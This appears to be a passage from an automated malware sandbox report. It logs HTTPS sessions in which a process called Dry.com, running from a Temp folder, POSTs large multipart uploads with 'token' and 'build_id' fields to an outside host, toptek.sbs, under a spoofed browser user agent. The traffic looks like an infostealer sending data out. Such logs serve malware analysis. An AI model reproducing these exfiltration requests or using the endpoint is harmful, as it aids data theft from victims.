                                                                                                                                                                                                                                                                                  2024-12-23 05:21:53 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 5a 43 54 30 52 51 31 36 50 38 59 4d 37 51 49 35 38 39 5a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 36 63 39 39 62 34 65 61 31 31 30 37 64 36 37 37 38 31 65 31 33 32 62 32 39 36 63 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 5a 43 54 30 52 51 31 36 50 38 59 4d 37 51 49 35 38 39 5a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 5a 43 54 30 52 51 31 36 50 38 59 4d 37 51 49 35 38 39 5a 35 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                  Data Ascii: ------ZCT0RQ16P8YM7QI589Z5Content-Disposition: form-data; name="token"a66c99b4ea1107d67781e132b296cd32------ZCT0RQ16P8YM7QI589Z5Content-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------ZCT0RQ16P8YM7QI589Z5Cont
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:53 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:53 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:53 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:53 UTC581OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:54 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:21:54 GMT
                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:54 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  18192.168.2.44977594.130.188.574437548C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:56 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----E3E3OPZUA1N7YU3OPH4W
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                  Content-Length: 153381
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:56 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 45 33 45 33 4f 50 5a 55 41 31 4e 37 59 55 33 4f 50 48 34 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 36 63 39 39 62 34 65 61 31 31 30 37 64 36 37 37 38 31 65 31 33 32 62 32 39 36 63 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 45 33 45 33 4f 50 5a 55 41 31 4e 37 59 55 33 4f 50 48 34 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 45 33 45 33 4f 50 5a 55 41 31 4e 37 59 55 33 4f 50 48 34 57 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                  Data Ascii: ------E3E3OPZUA1N7YU3OPH4WContent-Disposition: form-data; name="token"a66c99b4ea1107d67781e132b296cd32------E3E3OPZUA1N7YU3OPH4WContent-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------E3E3OPZUA1N7YU3OPH4WCont
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:56 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:56 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:56 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:56 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:56 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:56 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:56 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:56 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:56 UTC6186OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:57 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:21:57 GMT
                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  19192.168.2.44977694.130.188.574437548C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:57 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----JWTR1VSJEKF37YUA168G
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                  Content-Length: 393697
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:57 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 57 54 52 31 56 53 4a 45 4b 46 33 37 59 55 41 31 36 38 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 36 63 39 39 62 34 65 61 31 31 30 37 64 36 37 37 38 31 65 31 33 32 62 32 39 36 63 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 57 54 52 31 56 53 4a 45 4b 46 33 37 59 55 41 31 36 38 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 57 54 52 31 56 53 4a 45 4b 46 33 37 59 55 41 31 36 38 47 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                  Data Ascii: ------JWTR1VSJEKF37YUA168GContent-Disposition: form-data; name="token"a66c99b4ea1107d67781e132b296cd32------JWTR1VSJEKF37YUA168GContent-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------JWTR1VSJEKF37YUA168GCont
